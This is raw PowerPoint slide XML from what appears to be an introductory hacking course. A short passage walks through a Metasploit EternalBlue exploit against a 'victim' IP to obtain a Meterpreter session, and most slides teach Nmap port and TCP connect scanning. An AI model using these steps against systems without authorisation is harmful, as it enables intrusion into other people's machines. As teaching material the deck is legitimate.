          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626724" y="493160"/>
            <a:ext cx="3797835" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as victim machines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365131093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3173"/>
            <a:ext cx="9144000" cy="3626566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410966" y="544530"/>
            <a:ext cx="8436925" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If eternal blue still exist we will get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> session and totally hacked into the victim device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But now almost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> fixed this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerablility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> so we are unable to exploit it in newly installed windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321535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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145575" y="573281"/>
            <a:ext cx="86370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sz="2800"/>
              <a:t>Port Scanning and Network Scaning using NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344513" y="1645913"/>
            <a:ext cx="3634500" cy="2369400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="241300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Scan a single host — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Scans a single host for 1000 well-known ports.These ports are the ones used by popular services like SQL, SNTP, apache, and others.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; nmap scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="394" name="Google Shape;394;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3978938" y="1645913"/>
            <a:ext cx="4650712" cy="34975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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145575" y="573281"/>
            <a:ext cx="86370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sz="2800"/>
              <a:t>Port Scanning and Network Scaning using NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344513" y="1645913"/>
            <a:ext cx="8244300" cy="2369400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0A0A23"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Port scanning is one of the most fundamental features of Nmap. We can scan for ports in several ways.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0A0A23"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Using the -p param to scan for a single port</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>   &gt; nmap -p 973 192.164.0.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="241300" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0A0A23"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If you specify the type of port, you can scan for information about a particular type of connection, for example for a TCP connection.</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; nmap -p T:7777, 973 192.164.0.1</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2300" b="1">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145575" y="573281"/>
            <a:ext cx="86370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sz="2800"/>
              <a:t>Port Scanning and Network Scaning using NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344513" y="1645913"/>
            <a:ext cx="8244300" cy="2369400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="241300" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0A0A23"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A range of ports can be scanned by separating them with a hyphen.</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; nmap -p 76–973 192.164.0.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="241300" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0A0A23"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We can also use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-top-ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>flag to specify the top n ports to scan.</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; nmap --top-ports 10 scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2300" b="1">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>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5"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP Connect Scan using NMAP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181969" y="1645913"/>
            <a:ext cx="3433200" cy="3018000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nmap -sT scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="416" name="Google Shape;416;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3729319" y="1273744"/>
            <a:ext cx="4900332" cy="37492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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157725" y="136575"/>
            <a:ext cx="84720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TCP Connect Scan using NMAP &amp; Wireshark</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Google Shape;423;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633150" y="4351050"/>
            <a:ext cx="7521000" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When a port is open</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nmap -p 80 -sT scanme.nmap.org </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="424" name="Google Shape;424;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538800" y="2475113"/>
            <a:ext cx="8171175" cy="1771219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="425" name="Google Shape;425;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538800" y="907275"/>
            <a:ext cx="8090851" cy="14631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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
